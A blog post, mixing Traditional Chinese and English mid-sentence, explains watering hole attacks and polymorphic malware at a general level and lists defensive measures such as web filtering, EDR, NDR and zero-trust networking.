水坑攻擊: APT 和網絡犯罪分子如何滲入安全基礎設施
我第一次接觸網路犯罪世界是許多年前透過一次水坑攻擊活動. 我訪問了一個波斯網站,發現它正在向訪客下載惡意軟體’ 瀏覽器. 我立刻聯絡了網站管理員, 他告訴我他們對此問題毫無技術知識. It became apparent that they were using an outdated CMS with well-known security vulnerabilities, which criminals were exploiting to target specific audiences and spread malware.
水坑攻擊 are some of the methods favored by cyber criminals and advanced persistent threat (APTs). In these attacks, cybercriminals use a tactic called “strategic web compromise” (SWC) to gain access to the victim’s organization’s network. By identifying websites frequently visited by target users, an attacker can infect those websites with malware and download it to an unsuspecting users’ device.
Malware used in watering hole attacks is designed to evade detection and remain undetected on the target’s device, giving attackers continuous access to sensitive information. This type of attack is of particular concern because it can go undetected for long periods of time, allowing attackers to gather sensitive information over time.
One type of commonly used malware in watering hole attacks is polymorphic malware. Polymorphic malware is a type of malicious software designed to constantly change its code and appearance in order to avoid detection by antivirus software and other security measures. This type of malware is particularly dangerous as it can mutate itself into many different forms, making it difficult for traditional antivirus/ anti-malware software to detect and remove it. Polymorphic malware can change its appearance using a variety of methods, including encryption, compression, and randomization.
Watering hole attacks are especially dangerous for small businesses, as they are often targeted due to weaker security measures compared to larger enterprises. However, even large organizations and government agencies have fallen victim to water hole attacks.
Below are some steps you can take to reduce your risk of becoming a victim of this type of attacks:
- Use web filtering: web filtering tools can block access to malicious or unknown websites and webpages. This prevents users from accidentally downloading malware from the watering hole.
- Use next-generation antivirus (NGAV): NGAV solutions use advanced detection techniques such as machine learning algorithms and behavioral analytics to identify and respond to new and previously unknown threats.
- Implement endpoint detection and response (EDR): EDR 解決方案監控筆記型電腦和桌面等端點的可疑行為,並能即時應對威脅.
- 實施基於網路的偵測與回應 (NDR): NDR 解決方案監控網路流量的可疑活動,並能偵測並回應傳統防毒軟體可能遺漏的威脅.
- 運用威脅情報: 威脅情報服務可以提供有關新興威脅的資訊, 包括多形態惡意軟體. 您可以利用這些資訊辨識潛在威脅,並採取適當行動保護您的網路
- 實施零信任網路: 零信任網路是一種安全模型,假設網路上的每個使用者和裝置都是潛在威脅. 使用者必須經過認證才能存取網路上的資源, and access is restricted to what is necessary.
- Use network segmentation: Network segmentation helps separate critical systems and sensitive data from the rest of the network. This prevents malware from spreading in the event of a successful attack.
文章免責聲明
觀點, 資訊, or opinions expressed are solely those of the author and do not necessarily represent those of his employer or the organizations with which he is affiliated.
The information contained in this post is for general information purposes only. The information is provided by Farhad Mofidi and while he strives to keep the information current and accurate, he does not make any representations or warranties of any kind, express or implied, regarding the completeness, accuracy, reliability, suitability or availability of the website. Farhad makes no representations or warranties. or any information, products or related graphics contained in any Post for any purpose.
Also, AI may be employed as a tool to provide suggestions and improve some of the contents or sentences. The ideas, thoughts, opinions, 最終產品為原創且由作者親自製作.